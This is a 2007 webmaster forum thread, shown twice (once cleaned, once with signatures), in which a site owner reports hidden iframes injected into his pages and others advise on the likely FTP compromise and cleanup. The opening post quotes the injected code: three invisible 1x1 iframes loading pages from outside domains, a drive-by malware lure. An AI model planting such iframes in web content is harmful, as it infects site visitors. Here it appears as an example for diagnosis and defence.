Someone has added code to my sites!

Jonno · 2007-09-20, 11:44 AM

Hi everyone I've been unable to work on my sites for a few months due to family reasons but now I'm revisiting them to start up again and I find when I go to my own sites I get a warning from my virus protection software. I've checked them out and found some code on them that I didn't put there. It looks like this

<iframe src='http://gdfcnt.info/ld/upl/' width='1' height='1' style='visibility: hidden;'></iframe><iframe src='http://mediacount.net/adv/013/new.php' width=1 height=1></iframe><iframe src='http://mediacount.net/strong/013/' width=1 height=1 style='visibility: hidden;'></iframe></body>

I'm a newbie and I'm not sure what's happened, any ideas? Any help would be appreciated

Thanks Jonno

LowryBigwood · 2007-09-20, 11:49 AM

Maybe someone has your ftp login details, I would recommend you change your pw immediately and then fix your site.

MrYum · 2007-09-20, 01:17 PM

Agree with Lowry...your ftp info may have been compromised.

Seems to me, there was something going around a few months ago about some sort of a server exploit where this crap was being inserted somehow.

Whatever the case, contact your host IMMEDIATELY and get your server secured and get that crap off of there. Once the info hits google, it can hurt your domain big time.

tigermom · 2007-09-20, 01:19 PM

You got hacked. It's possible that they got your account info like Lowry said, maybe using a keylogger trojan. Could have been another way though.

Things to do -
Contact your host/admin and ask them to check all of your sites for the code (or do it yourself, if it's not a lot of pages) and clean them up. It's possible that the code is on other pages as well.

Update your AV software, preferably using more than one software for this, then run a thorough cleanup and then change your passwords to any hosting accounts (and pretty much to everything else).

Been there, done that

papagmp · 2007-09-28, 08:02 PM

You also need to make sure your server operating system is up to date.

ALWAYS use proper password construction and control - never use the same password for anything on your server that you use for boards, memberships, emails, etc...

Great passwords never have complete words, always use special characters or numbers, and are ones a pissed-off ex-wife can't figure out..... (don't ask)

1Cf2D=prhel
one cat fucked two dogs and it equaled pure (or pur) hell

2007-09-20, 11:44 AM	#1
Jonno Rock stars ... is there anything they don't know? Join Date: Sep 2006 Location: UK Posts: 16	Someone has added code to my sites! Hi everyone I've been unable to work on my sites for a few months due to family reasons but now I'm revisiting them to start up again and I find when I go to my own sites I get a warning from my virus protection software. I've checked them out and found some code on them that I didn't put there. It looks like this <iframe src='http://gdfcnt.info/ld/upl/' width='1' height='1' style='visibility: hidden;'></iframe><iframe src='http://mediacount.net/adv/013/new.php' width=1 height=1></iframe><iframe src='http://mediacount.net/strong/013/' width=1 height=1 style='visibility: hidden;'></iframe></body> I'm a newbie and I'm not sure what's happened, any ideas? Any help would be appreciated Thanks Jonno

2007-09-20, 11:49 AM	#2
LowryBigwood Don't get discouraged; it's usually the last key that opens the lock... Join Date: Aug 2003 Location: Dallas, Tx Posts: 1,203	Maybe someone has your ftp login details, I would recommend you change your pw immediately and then fix your site. __________________ Free Porn Buddy \| Porn Buddy Blog

2007-09-20, 01:17 PM	#3
MrYum Arghhhh...submit yer sites ya ruddy swabs! Join Date: May 2004 Location: Sunny Florida! Posts: 5,108	Agree with Lowry...your ftp info may have been compromised. Seems to me, there was something going around a few months ago about some sort of a server exploit where this crap was being inserted somehow. Whatever the case, contact your host IMMEDIATELY and get your server secured and get that crap off of there. Once the info hits google, it can hurt your domain big time. __________________ Porno Flixxx Submissions SOTI Site Submissions Free Porn Resource Submissions

2007-09-20, 01:19 PM	#4
tigermom You can now put whatever you want in this space :) Join Date: Dec 2005 Posts: 893	You got hacked. It's possible that they got your account info like Lowry said, maybe using a keylogger trojan. Could have been another way though. Things to do - Contact your host/admin and ask them to check all of your sites for the code (or do it yourself, if it's not a lot of pages) and clean them up. It's possible that the code is on other pages as well. Update your AV software, preferably using more than one software for this, then run a thorough cleanup and then change your passwords to any hosting accounts (and pretty much to everything else). Been there, done that __________________ XLEF

2007-09-28, 08:02 PM	#5
papagmp That'll teach you to leave your sister unattended..... Join Date: Jan 2007 Location: Colorado Springs Posts: 1,803	You also need to make sure your server operating system is up to date. ALWAYS use proper password construction and control - never use the same password for anything on your server that you use for boards, memberships, emails, etc... Great passwords never have complete words, always use special characters or numbers, and are ones a pissed-off ex-wife can't figure out..... (don't ask) 1Cf2D=prhel one cat fucked two dogs and it equaled pure (or pur) hell __________________ Submit: OutlawFreePorn